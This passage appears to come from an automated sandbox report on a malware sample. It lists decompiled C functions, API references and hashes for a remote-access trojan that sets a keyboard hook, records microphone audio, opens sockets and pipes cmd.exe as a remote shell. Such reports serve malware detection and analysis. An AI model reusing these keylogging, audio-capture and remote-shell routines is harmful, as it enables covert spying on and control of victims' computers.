                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00412028
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041202F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetLastInputInfo$User32.dll
                                  • API String ID: 2574300362-1519888992
                                  • Opcode ID: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                  • Instruction ID: 4254d4a464572d01fe3095e43ecaf4df99145fa2531fe7b32d94017085124a09
                                  • Opcode Fuzzy Hash: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                  • Instruction Fuzzy Hash: F2C09B709D0650FB86011FA0AD1DBD83B15664B745721C933B902F5251CBB8D080EF1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040F4AE() {
                                  				_Unknown_base(*)()* _t2;
                                  
                                  				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
                                  				 *0x41bf1c = _t2;
                                  				return _t2;
                                  			}

                                  Instruction addresses: 0x0040f4c4, 0x0040f4ca, 0x0040f4cf

                                  APIs
                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F4BD
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040F4C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetCursorInfo$User32.dll
                                  • API String ID: 1646373207-2714051624
                                  • Opcode ID: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                  • Instruction ID: c5b485f27e89021cea1a89f12a6954dfd40793fe5a01e249b662889bc5cfc0be
                                  • Opcode Fuzzy Hash: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                  • Instruction Fuzzy Hash: F0C04C75551600A686005FA1BC0D6D53A14A956745711C436B802B1255CB7C41459E5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00413AED() {
                                  				_Unknown_base(*)()* _t2;
                                  
                                  				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
                                  				 *0x41c1f8 = _t2;
                                  				return _t2;
                                  			}

                                  Instruction addresses: 0x00413b03, 0x00413b09, 0x00413b0e

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00413AFC
                                  • GetProcAddress.KERNEL32(00000000), ref: 00413B03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetConsoleWindow$kernel32.dll
                                  • API String ID: 2574300362-100875112
                                  • Opcode ID: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                  • Instruction ID: 6ee53b0f0035eccf7fe7e145557d43f0b39688fed8dbf49153f7f93891f0b47b
                                  • Opcode Fuzzy Hash: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                  • Instruction Fuzzy Hash: 83C09BB4AD1611FB86015FA0BC4EAC87B145A46707332C077781191255DA7880C45A1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412D56(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
                                  				long _v8;
                                  				long _v12;
                                  				intOrPtr _t14;
                                  				struct _OVERLAPPED* _t19;
                                  				long _t22;
                                  				struct _OVERLAPPED* _t24;
                                  				void* _t28;
                                  
                                  				_t24 = 0;
                                  				_t14 = _a16;
                                  				if(_t14 == 0) {
                                  					_v12 = 0x40000000;
                                  					_v8 = 2;
                                  				} else {
                                  					if(_t14 == 1) {
                                  						_t22 = 4;
                                  						_v12 = _t22;
                                  						_v8 = _t22;
                                  					}
                                  				}
                                  				_t28 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24);
                                  				if(_t28 != 0xffffffff) {
                                  					if(_a16 != 1 || SetFilePointer(_t28, _t24, _t24, 2) != 0xffffffff) {
                                  						if(WriteFile(_t28, _a4, _a8,  &_a12, _t24) != 0) {
                                  							_t24 = 1;
                                  						}
                                  					}
                                  					CloseHandle(_t28);
                                  					_t19 = _t24;
                                  				} else {
                                  					_t19 = 0;
                                  				}
                                  				return _t19;
                                  			}

                                  Instruction addresses: 0x00412d5f, 0x00412d62, 0x00412d64, 0x00412d74, 0x00412d7b, 0x00412d66, 0x00412d67, 0x00412d6b, 0x00412d6c, 0x00412d6f, 0x00412d6f, 0x00412d67, 0x00412d99, 0x00412d9e, 0x00412da8, 0x00412dce, 0x00412dd0, 0x00412dd0, 0x00412dce, 0x00412dd3, 0x00412dd9, 0x00412da0, 0x00412da0, 0x00412da0, 0x00412dde

                                  APIs
                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00412DAF
                                  • WriteFile.KERNEL32(00000000,40000000,?,?,00000000), ref: 00412DC6
                                  • CloseHandle.KERNEL32(00000000), ref: 00412DD3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandlePointerWrite
                                  • String ID:
                                  • API String ID: 3604237281-0
                                  • Opcode ID: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction ID: ca773920b5f39e1e62b037f934487c6bab51a0d9f38e2d78726aa57b3ce32958
                                  • Opcode Fuzzy Hash: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction Fuzzy Hash: 26118E71500508BFDF118F94ED88FEF7B6CEB05368F108222F911D6190D2B54EA09768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0040B615(void* __ecx, intOrPtr _a4, void* _a8, short* _a12, char _a15) {
                                  				int _v8;
                                  				int _v12;
                                  				char* _t31;
                                  				signed int _t36;
                                  				signed int _t37;
                                  				void* _t46;
                                  
                                  				_v8 = 0;
                                  				_t31 = 0x415664;
                                  				if(RegQueryValueExW(_a8, _a12, 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
                                  					_t31 = malloc(_v8);
                                  					_t36 = _v8;
                                  					_t46 = _t31;
                                  					_t37 = _t36 >> 2;
                                  					memset(_t46 + _t37, memset(_t46, 0, _t37 << 2), (_t36 & 0x00000003) << 0);
                                  					RegQueryValueExW(_a8, _a12, 0,  &_v12, _t31,  &_v8);
                                  				}
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t31,  &_a15);
                                  				return _a4;
                                  			}

                                  Instruction addresses: 0x0040b62f, 0x0040b635, 0x0040b641, 0x0040b652, 0x0040b654, 0x0040b65b, 0x0040b65d, 0x0040b667, 0x0040b67a, 0x0040b67a, 0x0040b684, 0x0040b691

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B63D
                                  • malloc.MSVCRT ref: 0040B64B
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B67A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415664,?), ref: 0040B684
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryV?$allocator@Value$??0?$basic_string@G@1@@G@2@@std@@G@std@@U?$char_traits@malloc
                                  • String ID:
                                  • API String ID: 3506253819-0
                                  • Opcode ID: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                  • Instruction ID: 6657ce7e0b4af722a3644f787a918a8cc9d20f3304ca96b666d2b0068cb46159
                                  • Opcode Fuzzy Hash: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                  • Instruction Fuzzy Hash: 3E11097260010DFFDB05DF95DD80DEFBBBDEB88250B10406ABA05D6250D7719E149BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004028DC
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402915
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402928
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040295E,00000001,00000073), ref: 00402953
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@$??1?$basic_string@??4?$basic_string@V01@connectsocket
                                  • String ID:
                                  • API String ID: 182292213-0
                                  • Opcode ID: c8132844b4a173a6c1e4eca6246d48779cae89e30dd47f92cbf8853fb9f1e03b
                                  • Instruction ID: 3575325012e9a6a69ab12c81105f5cb7c7dcd4fb264b21d23710b3ab9203063c
                                  • Opcode Fuzzy Hash: c8132844b4a173a6c1e4eca6246d48779cae89e30dd47f92cbf8853fb9f1e03b
                                  • Instruction Fuzzy Hash: 0301B97170030867DB00BB76DE4D6EE3A5DDBC5350F40803ABE169B2D1CBB9894483D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00401181(void* __eflags, signed int _a4) {
                                  				intOrPtr _t16;
                                  				intOrPtr _t17;
                                  				intOrPtr _t19;
                                  				intOrPtr _t22;
                                  				intOrPtr _t28;
                                  				intOrPtr _t29;
                                  				intOrPtr _t30;
                                  				intOrPtr _t31;
                                  				intOrPtr _t32;
                                  				intOrPtr _t33;
                                  				signed int _t36;
                                  
                                  				_t38 = __eflags;
                                  				E0040180C(0x41b200, __eflags, _a4);
                                  				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d4);
                                  				_t36 = _a4 << 5;
                                  				_t16 = E0040180C(0x41b200, _t38, _a4);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t28 =  *0x41b1dc; // 0x1242ca8
                                  				 *((intOrPtr*)(_t36 + _t28)) = _t16;
                                  				_t17 =  *0x41b1dc; // 0x1242ca8
                                  				_t29 =  *0x41b1d4; // 0x0
                                  				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;
                                  				_t30 =  *0x41b1dc; // 0x1242ca8
                                  				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;
                                  				_t31 =  *0x41b1dc; // 0x1242ca8
                                  				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;
                                  				_t32 =  *0x41b1dc; // 0x1242ca8
                                  				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;
                                  				_t33 =  *0x41b1dc; // 0x1242ca8
                                  				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;
                                  				_t19 =  *0x41b1dc; // 0x1242ca8
                                  				waveInPrepareHeader( *0x41b198, _t19 + _t36, 0x20);
                                  				_t22 =  *0x41b1dc; // 0x1242ca8
                                  				return waveInAddBuffer( *0x41b198, _t36 + _t22, 0x20);
                                  			}

                                  Instruction addresses: 0x00401181, 0x00401196, 0x0040119d, 0x004011ab, 0x004011ae, 0x004011b5, 0x004011bb, 0x004011c3, 0x004011c6, 0x004011cb, 0x004011d1, 0x004011d5, 0x004011dd, 0x004011e1, 0x004011e7, 0x004011eb, 0x004011f1, 0x004011f5, 0x004011fb, 0x004011ff, 0x0040120d, 0x00401213, 0x0040122c

                                  APIs
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,0040116A,00000000), ref: 0040119D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,0040116A,00000000), ref: 004011B5
                                  • waveInPrepareHeader.WINMM(01242CA8,00000020,?,?,0040116A,00000000), ref: 0040120D
                                  • waveInAddBuffer.WINMM(?,00000020,?,?,0040116A,00000000), ref: 00401223
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                  • String ID:
                                  • API String ID: 1952094867-0
                                  • Opcode ID: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                  • Instruction ID: 8f998c45a3acb3b0b10d37a494ac82bd1c86fe74dd73c150e7a1b96005ae6754
                                  • Opcode Fuzzy Hash: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                  • Instruction Fuzzy Hash: 83111835600644FFCB159F65EC689E67BE6EB89394702C83DED0A87365DB31A801CBD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                  • RegQueryValueExA.ADVAPI32(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                  • RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                  • String ID:
                                  • API String ID: 2462357041-0
                                  • Opcode ID: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                  • Instruction ID: f17c32bc227b8fe577d0db1d358ecf0b28a093220f684ee6c8601fb0e55a49ce
                                  • Opcode Fuzzy Hash: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                  • Instruction Fuzzy Hash: F60108B650020DFFDF01DF90DC84DEA7B6DFB48348F104462FA05A6151D7309A659BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004052D5(intOrPtr* __ecx) {
                                  				struct tagMSG _v32;
                                  				intOrPtr* _t14;
                                  
                                  				_t14 = __ecx;
                                  				 *0x41b9a8 = __ecx;
                                  				if( *__ecx != 0) {
                                  					L3:
                                  					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                  						TranslateMessage( &_v32);
                                  						DispatchMessageA( &_v32);
                                  						goto L2;
                                  					}
                                  				} else {
                                  					 *_t14 = SetWindowsHookExA(0xd, E004052BA, 0, 0);
                                  					L2:
                                  					if( *_t14 != 0) {
                                  						goto L3;
                                  					}
                                  				}
                                  				return 0;
                                  			}

                                  Instruction addresses: 0x004052dd, 0x004052e1, 0x004052e9, 0x00405300, 0x0040530f, 0x00405315, 0x0040531f, 0x00000000, 0x0040531f, 0x004052eb, 0x004052fa, 0x004052fc, 0x004052fe, 0x00000000, 0x00000000, 0x004052fe, 0x0040532c

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Message$DispatchHookTranslateWindows
                                  • String ID:
                                  • API String ID: 1978648212-0
                                  • Opcode ID: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction ID: 3f8d98675bb246c8319de4d6d7df696f93bc8797274e956dc3fa59b7a05fdffb
                                  • Opcode Fuzzy Hash: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction Fuzzy Hash: 5DF03071900A05EBC7205FA6AC0CEDBBBFCEBD5B42B50443EA885E2190E6788441CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000,00409B39,6B03CB60), ref: 00412B5E
                                  • CloseHandle.KERNEL32(00000000), ref: 00412B89
                                  • CloseHandle.KERNEL32(00000000), ref: 00412B9A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleV?$allocator@$??0?$basic_string@G@1@@G@2@@std@@G@std@@OpenProcessU?$char_traits@
                                  • String ID:
                                  • API String ID: 284624841-0
                                  • Opcode ID: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction ID: ad3219438425194a21685df614a361962293db7adaf2229f34b8827cc35eabff
                                  • Opcode Fuzzy Hash: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction Fuzzy Hash: 40F0A435644519FBDB119F50DD48FDA376CEB04701F008162F90ADA151DBB0FA418B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 18%
                                  			E0040B5A2(intOrPtr _a4, void* _a8, short* _a12, char _a15, short* _a16) {
                                  				int _v8;
                                  				char _v2056;
                                  
                                  				_v8 = 0x400;
                                  				if(RegOpenKeyExW(_a8, _a12, 0, 0x20019,  &_a8) != 0) {
                                  					_push( &_a15);
                                  					_push(0x415800);
                                  				} else {
                                  					RegQueryValueExW(_a8, _a16, 0, 0,  &_v2056,  &_v8);
                                  					RegCloseKey(_a8);
                                  					_push( &_a15);
                                  					_push( &_v2056);
                                  				}
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z();
                                  				return _a4;
                                  			}

                                  Instruction addresses: 0x0040b5ae, 0x0040b5cb, 0x0040b601, 0x0040b602, 0x0040b5cd, 0x0040b5e2, 0x0040b5eb, 0x0040b5f4, 0x0040b5fb, 0x0040b5fb, 0x0040b60a, 0x0040b614

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                  • RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                  • RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                  • String ID:
                                  • API String ID: 4081865614-0
                                  • Opcode ID: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                  • Instruction ID: 08c4fdd74f089b672de4800a8e1209c34edbbd410ac70e3f0c9e675f1f7a205c
                                  • Opcode Fuzzy Hash: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                  • Instruction Fuzzy Hash: 3D01F67554010EFFDB11DF90ED45FDA7BBCFB08304F508062BA05AA1A0D770AA199B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E0040D87E() {
                                  				char _t9;
                                  				void* _t22;
                                  				void* _t28;
                                  				intOrPtr _t29;
                                  
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t22 - 0x10, _t28, 1));
                                  				_t29 =  *0x41b889; // 0x0
                                  				if(_t29 == 0) {
                                  					_t9 = E0040180C(_t22 - 0x10, _t29, 0);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  					E00402B8A(_t9);
                                  				}
                                  				E004017DD(_t22 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040D88E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D8B1
                                    • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                    • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                    • Part of subcall function 00402B8A: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                    • Part of subcall function 00402B8A: getenv.MSVCRT ref: 00402C34
                                    • Part of subcall function 00402B8A: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                    • Part of subcall function 00402B8A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                    • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                    • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                    • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                    • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CreateD@1@@PipeV01@@$??8std@@D@2@@0@V?$basic_string@Y?$basic_string@getenv
                                  • String ID:
                                  • API String ID: 187635395-0
                                  • Opcode ID: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                  • Instruction ID: 95a58a3f9309c0e5762bae13ef1d8417c4b6d23d487987f94e594afc93633c1a
                                  • Opcode Fuzzy Hash: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                  • Instruction Fuzzy Hash: 22F03A7191011CCBD704BBA6ECA99EE7B34EB64355B404C3BE412A20E1EBB90525CA5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 384503197-0
                                  • Opcode ID: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                  • Instruction ID: e9850064b0a36303cd24c251ff0e0265422eee26172e2298965a0cd1febf68d2
                                  • Opcode Fuzzy Hash: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                  • Instruction Fuzzy Hash: 30F0DA7141021EEBCF04EFA0EC49CEE7779FB48254B444429F926D20A0EB75A659CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
